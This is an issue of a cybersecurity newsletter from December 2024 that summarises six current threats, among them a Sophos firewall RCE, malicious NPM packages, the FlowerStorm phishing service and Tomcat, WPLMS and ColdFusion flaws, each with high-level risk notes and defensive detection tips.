Today’s Cybersecurity Threats and Trends - 12/26/2024

More NPM troubles as RCE's pop up everywhere!

Author

J.W. Croley
December 26, 2024

In partnership with

Stay up-to-date with AI

The Rundown is the most trusted AI newsletter in the world, with 800,000+ readers and exclusive interviews with AI leaders like Mark Zuckerberg.

Their expert research team spends all day learning what’s new in AI and talking with industry experts, then distills the most important developments into one free email every morning.

Plus, complete the quiz after signing up and they’ll recommend the best AI tools, guides, and courses – tailored to your needs.

1. Sophos Discloses Critical Firewall RCE Vulnerability

Primary Threat: Sophos has released a security advisory regarding a critical remote code execution (RCE) flaw in its firewall software. This vulnerability allows attackers to execute arbitrary code on affected systems, potentially compromising entire networks. Exploited via a maliciously crafted request, this flaw affects all supported versions of Sophos Firewall prior to the latest patch. Sophos urges users to update their firewalls immediately.

  • Risk: Unauthorized access, lateral movement, and full system compromise.

  • Detection Tips:

    • Monitor logs for unusual requests to firewall interfaces.

    • Flag any suspicious outbound traffic originating from Sophos Firewall.

    • Apply the latest patch to affected systems promptly.

2. Malicious RSPack and Vant Packages Published Using Stolen NPM Tokens

Primary Threat: Malicious NPM packages named RSPack and Vant were published using stolen developer tokens, according to Sonatype research. These packages inject malicious scripts that steal environment variables, credentials, and sensitive project data. Developers are urged to validate dependencies and remove any affected packages from their projects immediately.

  • Risk: Credential theft, project compromise, and unauthorized access to sensitive environments.

  • Detection Tips:

    • Scan dependencies for tampered or newly flagged packages.

    • Monitor for unexpected traffic to third-party services like Pastebin.

    • Regularly rotate and secure developer tokens to minimize misuse.

3. FlowerStorm Phishing Service Fills Void Left by Rockstar2FA

Primary Threat: A new phishing-as-a-service (PaaS) platform, FlowerStorm, has emerged to replace the recently disrupted Rockstar2FA service, according to Sophos X-Ops. FlowerStorm specializes in bypassing multi-factor authentication (MFA) protections, offering tools to intercept one-time passcodes and authenticate on behalf of victims. This service makes advanced phishing tactics accessible to a wider range of attackers.

  • Risk: Credential theft, account compromise, and unauthorized access to sensitive systems.

  • Detection Tips:

    • Monitor for failed MFA attempts followed by successful logins from unusual locations.

    • Flag phishing emails requesting MFA credentials or redirecting to spoofed login pages.

    • Implement phishing-resistant MFA methods, such as hardware tokens.

Did you know...?

The Phishing-as-a-Service (PaaS) model has grown rapidly over the last decade, making sophisticated phishing techniques accessible to novice cybercriminals. Platforms like Rockstar2FA and FlowerStorm highlight how attackers leverage automation to bypass even advanced defenses like MFA, proving that education and proactive monitoring remain critical in combating phishing campaigns.

4. Apache Fixes RCE Bypass in Tomcat Web Server

Primary Threat: Apache has patched a critical flaw in the Tomcat web server that allowed attackers to bypass existing security restrictions and execute remote code. This flaw, detailed in the Apache security advisory, affects multiple versions of Tomcat and is exploitable through improper deserialization of untrusted data. Organizations using Tomcat are urged to update immediately.

  • Risk: Arbitrary code execution, unauthorized server access, and potential data breaches.

  • Detection Tips:

    • Monitor web server logs for deserialization errors or unusual API requests.

    • Apply the latest Tomcat updates and review access control configurations.

    • Isolate web servers to prevent lateral movement in case of compromise.

5. WPLMS WordPress Plugins Address Critical Vulnerabilities

Primary Threat: Seven critical vulnerabilities have been identified in the WPLMS and VibeBP WordPress plugins, affecting over 100,000 educational websites. Patchstack researchers report that these flaws allow attackers to perform SQL injection, privilege escalation, and arbitrary file deletion. Administrators are urged to apply the available patches to protect against these critical risks.

  • Risk: Website defacement, unauthorized database access, and operational disruption.

  • Detection Tips:

    • Monitor WordPress logs for unauthorized privilege escalation or unusual database queries.

    • Block access to plugins with known vulnerabilities until patched.

    • Regularly audit installed plugins for security updates and best practices.

6. Adobe Warns of ColdFusion Bug with PoC Exploit

Primary Threat: Adobe has issued a security bulletin warning of a critical vulnerability in its ColdFusion software, which has an active proof-of-concept (PoC) exploit circulating online. This flaw allows attackers to execute arbitrary code and gain unauthorized control over ColdFusion servers. Immediate patching is strongly recommended to prevent exploitation.

  • Risk: Remote code execution, server compromise, and data exfiltration.

  • Detection Tips:

    • Monitor for unauthorized access to ColdFusion management interfaces.

    • Apply security patches from Adobe immediately.

    • Audit network traffic for signs of exploitation attempts targeting ColdFusion servers.

IN SUMMARY:

From the newly discovered FlowerStorm phishing platform to vulnerabilities in widely used technologies like Sophos Firewall, Apache Tomcat, and Adobe ColdFusion, today’s threats highlight the need for vigilance across diverse attack surfaces.

Malicious NPM packages like RSPack and Vant remind developers of the risks in supply chain dependencies, while WPLMS plugin flaws emphasize the importance of securing WordPress ecosystems.

Organizations must act promptly to patch vulnerabilities and educate users to detect advanced phishing tactics.

Stay vigilant, secure your systems, and keep your defenses updated to counter evolving threats.

J.W.

(P.S. Check out our partners! It goes a long way to support this newsletter!)